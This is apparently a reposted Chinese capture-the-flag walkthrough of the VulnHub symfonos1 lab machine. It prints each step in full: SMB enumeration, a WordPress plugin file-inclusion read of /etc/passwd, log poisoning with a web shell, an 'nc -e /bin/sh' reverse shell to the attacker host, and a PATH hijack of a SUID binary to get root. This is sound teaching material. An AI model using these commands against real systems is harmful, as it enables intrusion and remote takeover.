vulnhub之symfonos1的实践

admin 2024年8月26日11:00:12评论28 views字数 1417阅读4分43秒阅读模式

本周实践的是vulnhub的symfonos1镜像,

下载地址,https://download.vulnhub.com/symfonos/symfonos1.7z,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.88.0/24,

获取到靶机地址是192.168.88.136,

vulnhub之symfonos1的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.136,

发现靶机开了25端口的mail服务、80端口的web服务、139/445端口的smb服务,

vulnhub之symfonos1的实践

对smb服务进行扫描,enum4linux 192.168.88.136,

获取到anonymous和helios共享目录,

vulnhub之symfonos1的实践

访问anonymous,smbclient //192.168.88.136/anonymous,

查看共享文件,获取到几个可能用到的密码,

vulnhub之symfonos1的实践

用上面获取到密码qwerty访问helios共享目录,

smbclient --user=helios //192.168.88.136/helios --password=qwerty,查看共享文件,获取到web服务路径/h3l105,

vulnhub之symfonos1的实践

浏览器访问http://192.168.88.136/h3l105,

获取到web服务是wordpress应用,

vulnhub之symfonos1的实践

在kali攻击机上给靶机地址做个静态域名记录,symfonos.local,

对wordpress进行扫描,

wpscan --url http://symfonos.local/h3l105 --enumerate p,

获取到有mail-masta 1.0的插件,

vulnhub之symfonos1的实践

搜索到用文件包含漏洞,

vulnhub之symfonos1的实践

继续搜索到漏洞利用方法,

vulnhub之symfonos1的实践

浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd,

vulnhub之symfonos1的实践

telnet 192.168.88.136 25,给mail的日志注入一句话木马,

vulnhub之symfonos1的实践

浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id,

vulnhub之symfonos1的实践

kali攻击机上开个反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.88.136/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.88.131 4444,

获取到反弹shell,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',

查找root权限程序,find / -perm -u=s -type f 2>/dev/null,

获取到/opt/statuscheck,查看/opt/statuscheck,

获取到其执行了curl命令,

vulnhub之symfonos1的实践

制作假的curl命令,以及假的环境变量路径,执行/opt/statuscheck,

获取到新的shell,id确认有root权限,

vulnhub之symfonos1的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之symfonos1的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月26日11:00:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之symfonos1的实践https://cn-sec.com/archives/3095828.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息